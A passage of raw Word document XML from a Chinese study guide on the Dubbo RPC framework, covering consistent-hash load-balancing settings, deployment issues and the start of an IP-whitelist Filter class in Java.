        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>算法参见：</w:t>
      </w:r>
      <w:hyperlink r:id="rId304" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="FF8373"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>http://en.wikipedia.org/wiki/Consistent_hashing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>缺省只对第一个参数Hash，如果要修改，请配置&lt;dubbo:parameter key="hash.arguments" value="0,1" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="306" w:lineRule="atLeast"/>
        <w:ind w:left="272"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00135A74">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>缺省用160份虚拟节点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>，如果要修改，请配置&lt;dubbo:parameter key="hash.nodes" value="320" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B38D7" w:rsidRDefault="008B38D7" w:rsidP="008B38D7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="306" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>这几种算法是很常见的，如果想知道更多的负载均衡算法，可以看看nginx的配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E7E5E" w:rsidRDefault="007E7E5E" w:rsidP="007E7E5E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遇到过什么问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00804DCA" w:rsidRPr="00E71E0A" w:rsidRDefault="00804DCA" w:rsidP="007E7E5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>可以不用部署在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Jetty</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>容器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00804DCA" w:rsidRDefault="00804DCA" w:rsidP="00804DCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务容器是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>standalone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的启动程序，因为后台服务不需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JBoss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器的功能，如果硬要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器去加载服务提供方，增加复杂性，也浪费资源。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00804DCA" w:rsidRDefault="00804DCA" w:rsidP="00804DCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务容器只是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，并加载一个简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器，用于暴露服务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00804DCA" w:rsidRDefault="00804DCA" w:rsidP="00804DCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务容器的加载内容可以扩展，内置了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>spring, jetty, log4j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等加载，可通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>展点进行扩展，参见：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Container </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008439AF" w:rsidRDefault="00804DCA" w:rsidP="007E7E5E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E7E5E" w:rsidRDefault="008439AF" w:rsidP="007E7E5E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F627B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00804DCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F627B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) Spring Jar</w:t>
      </w:r>
      <w:r w:rsidR="00F627B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包冲突</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011150E" w:rsidRDefault="0011150E" w:rsidP="007E7E5E"/>
    <w:p w:rsidR="0011150E" w:rsidRDefault="008439AF" w:rsidP="007E7E5E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0011150E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="0011150E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同服务不同协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011150E" w:rsidRDefault="000B5062" w:rsidP="0011150E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5102696" cy="4213555"/>
            <wp:effectExtent l="19050" t="0" r="2704" b="0"/>
            <wp:docPr id="24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05" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5102775" cy="4213620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F627B0" w:rsidRDefault="00F627B0" w:rsidP="007E7E5E"/>
    <w:p w:rsidR="00F627B0" w:rsidRDefault="00F627B0" w:rsidP="007E7E5E"/>
    <w:p w:rsidR="000B5062" w:rsidRDefault="000B5062" w:rsidP="000B5062">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4696330" cy="3679546"/>
            <wp:effectExtent l="19050" t="0" r="9020" b="0"/>
            <wp:docPr id="24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06" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4700339" cy="3682687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B5062" w:rsidRPr="007E7E5E" w:rsidRDefault="00FB6B68" w:rsidP="007E7E5E">
      <w:r w:rsidRPr="00FB6B68">
        <w:t>http://www.cnblogs.com/php0368/archive/2015/02/13/4290791.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14A26" w:rsidRDefault="00E14A26" w:rsidP="00E14A26">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dubbo filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B65856" w:rsidRPr="00587B07" w:rsidRDefault="00B65856" w:rsidP="00587B07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>给dubbo接口添加白名单——dubbo Filter的使用，有需要的朋友可以参考下。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>在开发中，有时候需要限制访问的权限，白名单就是一种方法。对于Java Web应用，Spring的拦截器可以拦截Web接口的调用；而对于dubbo接口，Spring的拦截器就不管用了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B65856" w:rsidRDefault="00B65856" w:rsidP="00B65856">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>dubbo提供了Filter扩展，可以通过自定义Filter来实现这个功能。本文通过一个事例来演示如何实现dubbo接口的IP白名单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B65856" w:rsidRDefault="00050B79" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>扩展Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现com.alibaba.dubbo.rpc.Filter接口：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>public class AuthorityFilter implements Filter {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    private static final Logger LOGGER = LoggerFactory.getLogger(AuthorityFilter.class);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    private IpWhiteList ipWhiteList;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
